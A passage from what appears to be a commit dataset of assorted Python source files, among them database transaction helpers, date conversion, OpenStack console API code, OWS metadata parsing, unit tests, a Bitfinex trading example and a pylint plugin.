def __init__(self, *args, **kwargs):
self.func = None
self.xg = kwargs.get("xg")
self.independent = kwargs.get("independent")
self.parent_conn = None
if len(args) == 1 and callable(args[0]):
self.func = args[0]
def _begin(self):
options = CreateTransactionOptions(
xg = True if self.xg else False,
propagation = TransactionOptions.INDEPENDENT if self.independent else None
)
if IsInTransaction() and not self.independent:
raise RuntimeError("Nested transactions are not supported")
elif self.independent:
# If we're running an independent transaction, pop the current one
self.parent_conn = _PopConnection()
# Push a new connection, start a new transaction
conn = _GetConnection()
_PushConnection(None)
_SetConnection(conn.new_transaction(options))
# Clear the context cache at the start of a transaction
caching.clear_context_cache()
def _finalize(self):
_PopConnection() # Pop the transaction connection
if self.parent_conn:
# If there was a parent transaction, now put that back
_PushConnection(self.parent_conn)
self.parent_conn = None
# Clear the context cache at the end of a transaction
caching.clear_context_cache()
def __call__(self, *args, **kwargs):
def call_func(*_args, **_kwargs):
try:
self._begin()
result = self.func(*_args, **_kwargs)
_GetConnection().commit()
return result
except:
conn = _GetConnection()
if conn:
conn.rollback()
raise
finally:
self._finalize()
if not self.func:
assert args and callable(args[0])
self.func = args[0]
return call_func
if self.func:
return call_func(*args, **kwargs)
def __enter__(self):
self._begin()
def __exit__(self, *args, **kwargs):
if len(args) > 1 and isinstance(args[1], Exception):
_GetConnection().rollback() # If an exception happens, rollback
else:
_GetConnection().commit() # Otherwise commit
self._finalize()
atomic = AtomicDecorator
commit_on_success = AtomicDecorator # Alias to the old Django name for this kinda thing
| Python | 0.000012 |
a0d196af4d3854365bedb581d25d73af3271cb1a | add python script file | mydatetime.py | mydatetime.py | #!/usr/bin/python
from datetime import datetime,timedelta
import numpy
# -----------------------------------------------------------------
# mydatetime v0.2 for python
# Copyright (c) 2007 t.hada
# -----------------------------------------------------------------
###
# This script is convert from/into date into/from serial date
# Excels count 1900/2/29 (ref. Microsoft Help & Support No. 214019),
# but python don't count. Thus, return value from this script
# `toSerial()' is equals only after 1900/3/1
#
# if you need valid serial date, change base date `__ZERODATE'
# from (datetime.datetime(1970,1,1),25569)
# to (datetime.datetime(1900,1,1),1)
class mydatetime(datetime):
# base date
# to identify Excels
__ZERODATE=(datetime(1970,1,1,0,0,0,0),25569)
# to return valid serial date
#__ZERODATE=(datetime(1900,1,1,0,0,0,0),1)
# expressmilliseconds
__MILLIFMT='%u'
# constructor
def __init__(self,year,month,day,\
hour=0,minute=0,second=0,microsecond=0,tzinfo=0):
try:
# call parent's constructor
datetime.__init__(year,month,day,hour,\
minute,second,microsecond,tzinfo)
except: raise
def __sub__(self,t):
# if return value is <type 'timedelta'>
if t.__class__ == self.__class__ or \
t.__class__ == self.__ZERODATE[0].__class__:
return datetime.__sub__(self,t)
# else (mydatetime-timedelta) should be mydatetime
else:
tmp=datetime.__sub__(self,t)
return mydatetime(tmp.year,tmp.month,tmp.day,tmp.hour,\
tmp.minute,tmp.second,tmp.microsecond,tmp.tzinfo)
def __add__(self,t):
# if return value is <type 'timedelta'>
if t.__class__ == self.__class__ or \
t.__class__ == self.__ZERODATE[0].__class__:
return datetime.__add__(self,t)
# else (mydatetime-timedelta) should be mydatetime
else:
tmp=datetime.__add__(self,t)
return mydatetime(tmp.year,tmp.month,tmp.day,tmp.hour,\
tmp.minute,tmp.second,tmp.microsecond,tmp.tzinfo)
def strftime(self,fmt):
tmp=[]
for i in fmt.split('%%'):
tmp.append(('%06d'%self.microsecond)[:3]\
.join(i.split(self.__MILLIFMT)))
return datetime.strftime(self,'%%'.join(tmp))
# return serial date
def toSerial(self):
tmp=self-self.__ZERODATE[0]
serial_val=self.__ZERODATE[1]+tmp.days
serial_val=serial_val+float(tmp.seconds)/24/3600\
+float(tmp.microseconds)/24/3600/1000000
return serial_val
def fromTuple(d,t=(0,0,0)):
"""d=(year,month,day),t=(hour,min,sec),sec can be float
"""
try:
if type(t[2]) is float: f=int(t[2]*1000000-int(t[2])*1000000)
elif len(t)>=4: f=t[3]
else: f=0
# call parent's constructor
return mydatetime(d[0],d[1],d[2],t[0],t[1],int(t[2]),f)
except: raise
# return mydatetime from serial value
def fromSerial(val):
tmp=val-mydatetime._mydatetime__ZERODATE[1]
day=int(tmp)
sec=round((tmp-day)*24*3600,3)
dt=timedelta(days=day,seconds=sec)
tmp=mydatetime._mydatetime__ZERODATE[0]+dt
return mydatetime(tmp.year,tmp.month,tmp.day,\
tmp.hour,tmp.minute,tmp.second,tmp.microsecond,tmp.tzinfo)
def Serial2Sec(val,comp=False):
"""if comp is True, return complete seconds(LongInt) from ZERODATE
"""
if type(val)!=numpy.ndarray:
if type(val)!=type([]): numpy.array([val])
else: numpy.array(val)
else: True
c=24*3600
if not comp: return numpy.round((val-numpy.array(val,dtype=int))*c,3)
else:
val=val-mydatetime._mydatetime__ZERODATE[1]
return numpy.round((val-numpy.array(val,dtype=int))*c+numpy.array(val,dtype=int)*c,3)
if len(ret)==1: return ret[0]
else: return ret
| Python | 0.000002 | |
30bb73da2b75b5cfcaadf743762bccb119b2c147 | First challenge converted to Python 3 | set1/ch1/hextob64.py | set1/ch1/hextob64.py | #!/usr/bin/python3
"""
The string:
49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d
Should produce:
SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t
"""
import argparse
import base64
import sys
def hextobase64(hexstr):
return base64.b64encode(bytes(bytes.fromhex(hexstr).decode('utf-8'),'utf-8')).decode('utf-8')
def main(hexstring):
print(hextobase64(hexstring))
return 0
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Convert a hex string to base64.')
parser.add_argument('hex', help='hex string')
args = parser.parse_args()
sys.exit(main(args.hex))
| Python | 0.999736 | |
3129819c7d2ff3b35dd0270c0a27ef694a7e4d9e | Add regularizers.py | seya/regularizers.py | seya/regularizers.py | from keras.regularizers import Regularizer
class GaussianKL(Regularizer):
def set_param(self, p):
self.p = p
def set_layer(self, layer):
self.layer = layer
def __call__(self, loss):
# See Variational Auto-Encoding Bayes by Kingma and Welling.
mean, sigma = self.layer.get_output(True)
kl = -.5 - self.logsigma + .5 * (mean**2
+ T.exp(2 * self.logsigma))
loss += kl.mean()
return loss
def get_config(self):
return {"name": self.__class__.__name__}
class SimpleCost(Regularizer):
def set_param(self, cost):
self.cost = cost
def __call__(self, loss):
loss += self.cost
return loss
def get_config(self):
return {"name": self.__class__.__name__}
| Python | 0 | |
0a47253307d427c6e668d7cdf3bdf186dfc93858 | Fix the ConsolesController class doc string | nova/api/openstack/compute/contrib/consoles.py | nova/api/openstack/compute/contrib/consoles.py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova import exception
from nova.openstack.common.gettextutils import _
authorize = extensions.extension_authorizer('compute', 'consoles')
class ConsolesController(wsgi.Controller):
def __init__(self, *args, **kwargs):
self.compute_api = compute.API()
super(ConsolesController, self).__init__(*args, **kwargs)
@wsgi.action('os-getVNCConsole')
def get_vnc_console(self, req, id, body):
"""Get vnc connection information to access a server."""
context = req.environ['nova.context']
authorize(context)
# If type is not supplied or unknown, get_vnc_console below will cope
console_type = body['os-getVNCConsole'].get('type')
try:
instance = self.compute_api.get(context, id)
output = self.compute_api.get_vnc_console(context,
instance,
console_type)
except exception.InstanceNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.InstanceNotReady as e:
raise webob.exc.HTTPConflict(
explanation=_('Instance not yet ready'))
return {'console': {'type': console_type, 'url': output['url']}}
@wsgi.action('os-getSPICEConsole')
def get_spice_console(self, req, id, body):
"""Get spice connection information to access a server."""
context = req.environ['nova.context']
authorize(context)
# If type is not supplied or unknown, get_spice_console below will cope
console_type = body['os-getSPICEConsole'].get('type')
try:
instance = self.compute_api.get(context, id)
output = self.compute_api.get_spice_console(context,
instance,
console_type)
except exception.InstanceNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.InstanceNotReady as e:
raise webob.exc.HTTPConflict(explanation=e.format_message())
return {'console': {'type': console_type, 'url': output['url']}}
def get_actions(self):
"""Return the actions the extension adds, as required by contract."""
actions = [extensions.ActionExtension("servers", "os-getVNCConsole",
self.get_vnc_console),
extensions.ActionExtension("servers", "os-getSPICEConsole",
self.get_spice_console)]
return actions
class Consoles(extensions.ExtensionDescriptor):
"""Interactive Console support."""
name = "Consoles"
alias = "os-consoles"
namespace = "http://docs.openstack.org/compute/ext/os-consoles/api/v2"
updated = "2011-12-23T00:00:00+00:00"
def get_controller_extensions(self):
controller = ConsolesController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
| # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova import exception
from nova.openstack.common.gettextutils import _
authorize = extensions.extension_authorizer('compute', 'consoles')
class ConsolesController(wsgi.Controller):
def __init__(self, *args, **kwargs):
self.compute_api = compute.API()
super(ConsolesController, self).__init__(*args, **kwargs)
@wsgi.action('os-getVNCConsole')
def get_vnc_console(self, req, id, body):
"""Get text console output."""
context = req.environ['nova.context']
authorize(context)
# If type is not supplied or unknown, get_vnc_console below will cope
console_type = body['os-getVNCConsole'].get('type')
try:
instance = self.compute_api.get(context, id)
output = self.compute_api.get_vnc_console(context,
instance,
console_type)
except exception.InstanceNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.InstanceNotReady as e:
raise webob.exc.HTTPConflict(
explanation=_('Instance not yet ready'))
return {'console': {'type': console_type, 'url': output['url']}}
@wsgi.action('os-getSPICEConsole')
def get_spice_console(self, req, id, body):
"""Get text console output."""
context = req.environ['nova.context']
authorize(context)
# If type is not supplied or unknown, get_spice_console below will cope
console_type = body['os-getSPICEConsole'].get('type')
try:
instance = self.compute_api.get(context, id)
output = self.compute_api.get_spice_console(context,
instance,
console_type)
except exception.InstanceNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.InstanceNotReady as e:
raise webob.exc.HTTPConflict(explanation=e.format_message())
return {'console': {'type': console_type, 'url': output['url']}}
def get_actions(self):
"""Return the actions the extension adds, as required by contract."""
actions = [extensions.ActionExtension("servers", "os-getVNCConsole",
self.get_vnc_console),
extensions.ActionExtension("servers", "os-getSPICEConsole",
self.get_spice_console)]
return actions
class Consoles(extensions.ExtensionDescriptor):
"""Interactive Console support."""
name = "Consoles"
alias = "os-consoles"
namespace = "http://docs.openstack.org/compute/ext/os-consoles/api/v2"
updated = "2011-12-23T00:00:00+00:00"
def get_controller_extensions(self):
controller = ConsolesController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
| Python | 0.996907 |
e0eb68fa33dc6dea9f1b4a0f6cb1161e4128cfd7 | add paper sim by summary | recommendation/paper_sim_by_summary.py | recommendation/paper_sim_by_summary.py | import MySQLdb
import sys
sys.path.append("../../include/python/")
from paper import Paper
import math
from operator import itemgetter
def getWordFreq():
connection1 = MySQLdb.connect(host = "127.0.0.1", user = "recop", passwd = "recop", db = "recop")
cursor1 = connection1.cursor()
cursor1.execute("select id, titile, abstract from paper where length(abstract) > 50")
ret = dict()
numrows = int(cursor1.rowcount)
for k in range(numrows):
if k % 10000 == 0:
print k
row = cursor1.fetchone()
paper_id = row[0]
entities = dict()
words = (row[1] + " " + row[2].lower()).split()
for word in words:
if word not in ret:
ret[word] = 1
else:
ret[word] = ret[word] + 1
cursor1.close()
connection1.close()
return ret
def generatePaperEntities():
word_freq = getWordFreq()
connection1 = MySQLdb.connect(host = "127.0.0.1", user = "recop", passwd = "recop", db = "recop")
cursor1 = connection1.cursor()
connection2 = MySQLdb.connect(host = "127.0.0.1", user = "recop", passwd = "recop", db = "recop")
cursor2 = connection2.cursor()
cursor2.execute("truncate table tmp_paper_entities;")
cursor1.execute("select id, titile, abstract from paper where length(abstract) > 50")
entity_dict = dict()
numrows = int(cursor1.rowcount)
for k in range(numrows):
if k % 10000 == 0:
print k
row = cursor1.fetchone()
paper_id = row[0]
entities = dict()
words = (row[1] + " " + row[2].lower()).split()
for word in words:
if word not in word_freq:
continue
if word_freq[word] > 200:
continue
if word not in entities:
entities[word] = 1
else:
entities[word] = entities[word] + 1
for (entity,weight) in entities.items():
entity_id = len(entity_dict)
if entity in entity_dict:
entity_id = entity_dict[entity]
else:
entity_dict[entity] = entity_id
cursor2.execute("replace into tmp_paper_entities (paper_id, entity_id, weight) values (%s, %s, %s)", (paper_id, entity_id, weight))
cursor1.close()
connection1.close()
cursor2.close()
connection2.close()
def paperSim():
connection = MySQLdb.connect(host = "127.0.0.1", user = "recop", passwd = "recop", db = "recop")
cursor = connection.cursor()
cursor.execute("truncate table papersim_summary;")
for mod in range(20):
simTable = dict()
cursor.execute("select paper_id, entity_id from tmp_paper_entities order by entity_id;")
numrows = int(cursor.rowcount)
print numrows
prev_entity = -1
papers = []
for k in range(numrows):
if k % 100000 == 0:
print k
row = cursor.fetchone()
entity_id = row[1]
paper_id = row[0]
if prev_entity != entity_id:
if len(papers) < 200:
for i in papers:
if i % 20 != mod:
continue
if i not in simTable:
simTable[i] = dict()
for j in papers:
if i == j:
continue
if j not in simTable[i]:
simTable[i][j] = 0
weight = 1 / math.log(2 + len(papers))
simTable[i][j] = simTable[i][j] + weight
prev_entity = entity_id
papers = []
papers.append(paper_id)
print len(simTable)
n = 0
for i, rels in simTable.items():
n = n + 1
if n % 10000 == 0:
print n
k = 0
for j, weight in sorted(rels.items(), key = itemgetter(1), reverse = True):
cursor.execute("replace into papersim_summary(src_id, dst_id, weight) values (%s, %s, %s);", (i, j, weight))
k = k + 1
if k > 10:
break
connection.commit()
curosr.close()
connection.close()
#generatePaperEntities()
paperSim()
| Python | 0.000001 | |
bdb75567519914386da7f1d598c6c7aaf96d8e02 | Add sql solution for 561. Array Partition I | py/array-partition-i.py | py/array-partition-i.py | class Solution(object):
def arrayPairSum(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
return sum(sorted(nums)[::2])
| Python | 0.999996 | |
7275a50343cba5073dc2fa77e2e964daec002c38 | move refactored OttTestCase to utils | ott/utils/tests/ott_test_case.py | ott/utils/tests/ott_test_case.py | import os
import sys
import unittest
import urllib
import contextlib
from ott.utils import config_util
from ott.utils import file_utils
class OttTestCase(unittest.TestCase):
domain = "localhost"
port = "33333"
path = None
url_file = None
def get_url(self, svc_name, params=None, lang=None):
# import pdb; pdb.set_trace()
if self.path:
ret_val = "http://{}:{}/{}/{}".format(self.domain, self.port, self.path, svc_name)
else:
ret_val = "http://{}:{}/{}".format(self.domain, self.port, svc_name)
if params:
ret_val = "{0}?{1}".format(ret_val, params)
if lang:
ret_val = "{0}&_LOCALE_={1}".format(ret_val, lang)
if self.url_file:
url = ret_val.replace(" ", "+")
self.url_file.write(url)
self.url_file.write("\n")
return ret_val
def call_url(self, url):
ret_json = None
with contextlib.closing(urllib.urlopen(url)) as f:
ret_json = f.read()
return ret_json
def setUp(self):
dir = file_utils.get_project_root_dir()
ini = config_util.ConfigUtil('development.ini', run_dir=dir)
port = ini.get('ott.test_port', 'app:main')
if not port:
port = ini.get('ott.svr_port', 'app:main', self.port)
self.port = port
url_file = ini.get('ott.test_urlfile', 'app:main')
if url_file:
self.url_file = open(os.path.join(dir, url_file), "a+")
test_domain = ini.get('ott.test_domain', 'app:main')
if test_domain:
self.domain = test_domain
test_path = ini.get('ott.test_path', 'app:main')
if test_path:
self.path = test_path
def tearDown(self):
if self.url_file:
url_file.flush()
url_file.close()
def call_url_match_list(self, url, list):
u = self.call_url(url)
for l in list:
self.assertRegexpMatches(u, l)
def call_url_match_string(self, url, str):
u = self.call_url(url)
self.assertRegexpMatches(u, str)
| Python | 0.000001 | |
e07c699caf699852c98b3396150b343553a386c4 | Add tests for language api | server/tests/api/test_language_api.py | server/tests/api/test_language_api.py | import json
from server.tests.helpers import FlaskTestCase, fixtures
class TestLanguageAPI(FlaskTestCase):
@fixtures('base.json')
def test_get_empty_languages(self):
"""Test GET /api/languages endpoint with no data"""
response, data = self.api_request('get', '/api/languages')
assert data['num_results'] is 0
assert response.status_code == 200
@fixtures('single_language.json')
def test_get_one_language(self):
"""Test GET /api/languages endpoint with a single language"""
response, data = self.api_request('get', '/api/languages')
assert data['num_results'] is 1
assert response.status_code == 200
@fixtures('many_languages.json')
def test_get_multiple_languages(self):
"""Test GET /api/languages endpoint with multple languages"""
response, data = self.api_request('get', '/api/languages')
assert data['num_results'] > 0
assert response.status_code == 200
@fixtures('many_languages.json')
def test_get_no_language_by_id(self):
"""Test GET /api/languages/(int:id) for missing language"""
response, data = self.api_request('get', '/api/languages/1000')
assert response.status_code == 404
@fixtures('many_languages.json')
def test_language_by_id(self):
"""Test GET /api/languages(int:id) for existing language"""
response, data = self.api_request('get', '/api/languages/1')
assert data['language'] == 'Python'
assert response.status_code == 200
@fixtures('single_user.json')
def test_post_language(self):
"""Tests POST to /api/languages for an authorized user"""
self.login()
data = {
'language': 'some_value'
}
response = self.app.post(
'/api/languages',
data=json.dumps(data)
)
assert response.status_code == 201
@fixtures('base.json')
def test_post_language_unauthorized(self):
"""Tests POST to /api/languages for an unauthorized user"""
data = {
'language': 'some_value'
}
response = self.app.post(
'/api/languages',
data=json.dumps(data)
)
assert response.status_code == 401
| Python | 0 | |
5f56abf2e3bef6d7947b08603b86f59254bed000 | add support for OGC Web Services Common 1.1.0 (#172) | owslib/ows.py | owslib/ows.py | # -*- coding: ISO-8859-15 -*-
# =============================================================================
# Copyright (c) 2008 Tom Kralidis
#
# Authors : Tom Kralidis <tomkralidis@hotmail.com>
#
# Contact email: tomkralidis@hotmail.com
# =============================================================================
"""
API for OGC Web Services Common (OWS) constructs and metadata.
OWS Common: http://www.opengeospatial.org/standards/common
Currently supports version 1.1.0 (06-121r3).
"""
from owslib.etree import etree
from owslib import util
OWS_NAMESPACE_1_0_0 = 'http://www.opengis.net/ows'
OWS_NAMESPACE_1_1_0 = 'http://www.opengis.net/ows/1.1'
XSI_NAMESPACE = 'http://www.w3.org/2001/XMLSchema-instance'
XLINK_NAMESPACE = 'http://www.w3.org/1999/xlink'
class OwsCommon(object):
"""Initialize OWS Common object"""
def __init__(self,version):
self.version = version
if version == '1.0.0':
self.namespace = OWS_NAMESPACE_1_0_0
else:
self.namespace = OWS_NAMESPACE_1_1_0
class ServiceIdentification(object):
"""Initialize an OWS Common ServiceIdentification construct"""
def __init__(self,infoset,namespace):
self._root = infoset
val = self._root.find(util.nspath('Title', namespace))
self.title = util.testXMLValue(val)
val = self._root.find(util.nspath('Abstract', namespace))
self.abstract = util.testXMLValue(val)
self.keywords = [f.text for f in self._root.findall(util.nspath('Keywords/Keyword', namespace))]
val = self._root.find(util.nspath('AccessConstraints', namespace))
self.accessconstraints = util.testXMLValue(val)
val = self._root.find(util.nspath('Fees', namespace))
self.fees = util.testXMLValue(val)
val = self._root.find(util.nspath('ServiceType', namespace))
self.type = util.testXMLValue(val)
val = self._root.find(util.nspath('ServiceTypeVersion', namespace))
self.version = util.testXMLValue(val)
class ServiceProvider(object):
"""Initialize an OWS Common ServiceProvider construct"""
def __init__(self, infoset,namespace):
self._root = infoset
val = self._root.find(util.nspath('ProviderName', namespace))
self.name = util.testXMLValue(val)
self.contact = ServiceContact(infoset, namespace)
class ServiceContact(object):
"""Initialize an OWS Common ServiceContact construct"""
def __init__(self, infoset,namespace):
self._root = infoset
val = self._root.find(util.nspath('ProviderName', namespace))
self.name = util.testXMLValue(val)
val = self._root.find(util.nspath('ProviderSite', namespace))
if val is not None:
self.site = util.testXMLValue(val.attrib.get(util.nspath('href', XLINK_NAMESPACE)), True)
else:
self.site = None
val = self._root.find(util.nspath('ServiceContact/Role', namespace))
self.role = util.testXMLValue(val)
val = self._root.find(util.nspath('ServiceContact/IndividualName', namespace))
self.name = util.testXMLValue(val)
val = self._root.find(util.nspath('ServiceContact/PositionName', namespace))
self.position = util.testXMLValue(val)
val = self._root.find(util.nspath('ServiceContact/ContactInfo/Phone/Voice', namespace))
self.phone = util.testXMLValue(val)
val = self._root.find(util.nspath('ServiceContact/ContactInfo/Phone/Facsimile', namespace))
self.fax = util.testXMLValue(val)
val = self._root.find(util.nspath('ServiceContact/ContactInfo/Address/DeliveryPoint', namespace))
self.address = util.testXMLValue(val)
val = self._root.find(util.nspath('ServiceContact/ContactInfo/Address/City', namespace))
self.city = util.testXMLValue(val)
val = self._root.find(util.nspath('ServiceContact/ContactInfo/Address/AdministrativeArea', namespace))
self.region = util.testXMLValue(val)
val = self._root.find(util.nspath('ServiceContact/ContactInfo/Address/PostalCode', namespace))
self.postcode = util.testXMLValue(val)
val = self._root.find(util.nspath('ServiceContact/ContactInfo/Address/Country', namespace))
self.country = util.testXMLValue(val)
val = self._root.find(util.nspath('ServiceContact/ContactInfo/Address/ElectronicMailAddress', namespace))
self.email = util.testXMLValue(val)
val = self._root.find(util.nspath('ServiceContact/ContactInfo/OnlineResource', namespace))
if val is not None:
self.url = util.testXMLValue(val.attrib.get(util.nspath('href', XLINK_NAMESPACE)), True)
else:
self.url = None
val = self._root.find(util.nspath('ServiceContact/ContactInfo/HoursOfService', namespace))
self.hours = util.testXMLValue(val)
val = self._root.find(util.nspath('ServiceContact/ContactInfo/ContactInstructions', namespace))
self.instructions = util.testXMLValue(val)
class OperationsMetadata(object):
"""Initialize an OWS OperationMetadata construct"""
def __init__(self,elem,namespace):
self.name = elem.attrib['name']
self.formatOptions = ['text/xml']
methods = []
for verb in elem.find(util.nspath('DCP/HTTP', namespace)):
methods.append((self.name, {'url': verb.attrib[util.nspath('href', XLINK_NAMESPACE)]}))
self.methods = dict(methods)
class BoundingBox(object):
"""Initialize an OWS BoundingBox construct"""
def __init__(self, elem, namespace):
val = elem.attrib.get('crs')
self.crs = util.testXMLValue(val, True)
val = elem.find(util.nspath('LowerCorner', namespace))
if val is not None:
tmp = util.testXMLValue(val)
self.minx, self.miny = tmp.split()
else:
self.minx, self.miny = None
val = elem.find(util.nspath('UpperCorner', namespace))
if val is not None:
tmp = util.testXMLValue(val)
self.maxx, self.maxy = tmp.split()
else:
self.maxx, self.maxy = None
class ExceptionReport(object):
"""Initialize an OWS ExceptionReport construct"""
def __init__(self, elem, namespace):
self.exceptions = []
for i in elem.findall(util.nspath('Exception', namespace)):
tmp = {}
val = i.attrib.get('exceptionCode')
tmp['exceptionCode'] = util.testXMLValue(val, True)
val = i.attrib.get('locator')
tmp['locator'] = util.testXMLValue(val, True)
val = i.find(util.nspath('ExceptionText', namespace))
tmp['ExceptionText'] = util.testXMLValue(val)
self.exceptions.append(tmp)
| Python | 0 | |
6e736a48f8c49b8257305125742d89cb7f729fbc | index Ansible source versions | shotglass/make_ver_ansible.py | shotglass/make_ver_ansible.py | #!/usr/bin/env python
'''
make_versions -- index many versions of a project
ALPHA code, will need modification for general use.
'''
import re
import subprocess
import sys
import git
NAME = 'ansible'
bad_tag_re = re.compile(r'(rc|beta|alpha)')
repos = git.Repo(NAME)
tags = [tag.name for tag in repos.tags
if tag.name.startswith('v') and not bad_tag_re.search(tag.name)]
checkout_cmd = 'cd {name} ; git checkout {tag}'
index_cmd = './manage.py make_index --project={name}-{tag} {name}'
for tag in tags[:2]:
cmd = checkout_cmd.format(name=NAME, tag=tag)
print '>>>', cmd
if subprocess.call(cmd, shell=True):
sys.exit(0)
cmd = index_cmd.format(name=NAME, tag=tag)
print '>>>', cmd
out = subprocess.check_output(cmd, shell=True)
print out
| Python | 0 | |
24e6a8a21ef61edbe00e6af8a1aea274394a23ed | Add a snippet (python/pygtk). | python/pygtk/minimal.py | python/pygtk/minimal.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012 Jérémie DECOCK (http://www.jdhp.org)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import pygtk
pygtk.require('2.0')
import gtk
def main():
"""Main function"""
window = gtk.Window(gtk.WINDOW_TOPLEVEL)
window.show()
gtk.main()
if __name__ == '__main__':
main()
| Python | 0.000036 | |
08e4f449f0e871f996e9a265fd23a967a0377078 | Add bfx example | quant/example/ex_bfx.py | quant/example/ex_bfx.py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import time
from quant import config
from quant.api.bitfinex import PrivateClient
client = PrivateClient(key=config.Bitfinex_SUB_API_KEY, secret=config.Bitfinex_SUB_SECRET_TOKEN)
# client = PrivateClient(key=config.Bitfinex_API_KEY, secret=config.Bitfinex_SECRET_TOKEN)
# print(client.ticker('eosbtc'))
# print(client.balances())
amount = '20.0'
price = '0.00015'
symbol = 'eosbtc'
r_id = client.buy(symbol=symbol, amount=amount, price=price)
print(r_id)
if r_id:
time.sleep(1)
client.cancel_order(r_id)
# print(client.cancel_all_orders())
| Python | 0 | |
800639fe381ec502e54a3fbd95241b460bd3e3c3 | add tests for shannon.py | dit/algorithms/tests/test_shannon.py | dit/algorithms/tests/test_shannon.py | from __future__ import division
from nose.tools import *
from dit import Distribution as D, ScalarDistribution as SD
from dit.algorithms import (entropy as H,
mutual_information as I,
conditional_entropy as CH)
def test_H1():
d = SD([1/2, 1/2])
assert_almost_equal(H(d), 1.0)
def test_H2():
assert_almost_equal(H(1/2), 1.0)
def test_H3():
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = D(outcomes, pmf)
assert_almost_equal(H(d, [0]), 1.0)
assert_almost_equal(H(d, [1]), 1.0)
assert_almost_equal(H(d, [0,1]), 2.0)
assert_almost_equal(H(d), 2.0)
def test_H4():
d = SD([1/10]*10)
d.set_base(10)
assert_almost_equal(H(d), 1.0)
def test_I1():
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = D(outcomes, pmf)
assert_almost_equal(I(d, [0], [1]), 0.0)
def test_I2():
outcomes = ['00', '11']
pmf = [1/2]*2
d = D(outcomes, pmf)
assert_almost_equal(I(d, [0], [1]), 1.0)
def test_I3():
outcomes = ['000', '011', '101', '110']
pmf = [1/4]*4
d = D(outcomes, pmf)
assert_almost_equal(I(d, [0,1], [1,2]), 2.0)
def test_CH1():
outcomes = ['000', '011', '101', '110']
pmf = [1/4]*4
d = D(outcomes, pmf)
assert_almost_equal(CH(d, [0], [1,2]), 0.0)
assert_almost_equal(CH(d, [0,1], [2]), 1.0)
assert_almost_equal(CH(d, [0], [0]), 0.0) | Python | 0 | |
8c1353537d0920d8137d5ea9d22843da67e41d9a | Add string_format pylint plugin. | test/sanity/pylint/plugins/string_format.py | test/sanity/pylint/plugins/string_format.py | # (c) 2018, Matt Martz <matt@sivel.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import sys
import six
import astroid
from pylint.interfaces import IAstroidChecker
from pylint.checkers import BaseChecker
from pylint.checkers import utils
from pylint.checkers.utils import check_messages
from pylint.checkers.strings import parse_format_method_string
_PY3K = sys.version_info[:2] >= (3, 0)
MSGS = {
'E9305': ("Format string contains automatic field numbering "
"specification",
"ansible-format-automatic-specification",
"Used when a PEP 3101 format string contains automatic "
"field numbering (e.g. '{}').",
{'minversion': (2, 6)}),
'E9390': ("bytes object has no .format attribute",
"ansible-no-format-on-bytestring",
"Used when a bytestring was used as a PEP 3101 format string "
"as Python3 bytestrings do not have a .format attribute",
{'minversion': (3, 0)}),
}
class AnsibleStringFormatChecker(BaseChecker):
"""Checks string formatting operations to ensure that the format string
is valid and the arguments match the format string.
"""
__implements__ = (IAstroidChecker,)
name = 'string'
msgs = MSGS
@check_messages(*(MSGS.keys()))
def visit_call(self, node):
func = utils.safe_infer(node.func)
if (isinstance(func, astroid.BoundMethod)
and isinstance(func.bound, astroid.Instance)
and func.bound.name in ('str', 'unicode', 'bytes')):
if func.name == 'format':
self._check_new_format(node, func)
def _check_new_format(self, node, func):
""" Check the new string formatting """
if (isinstance(node.func, astroid.Attribute)
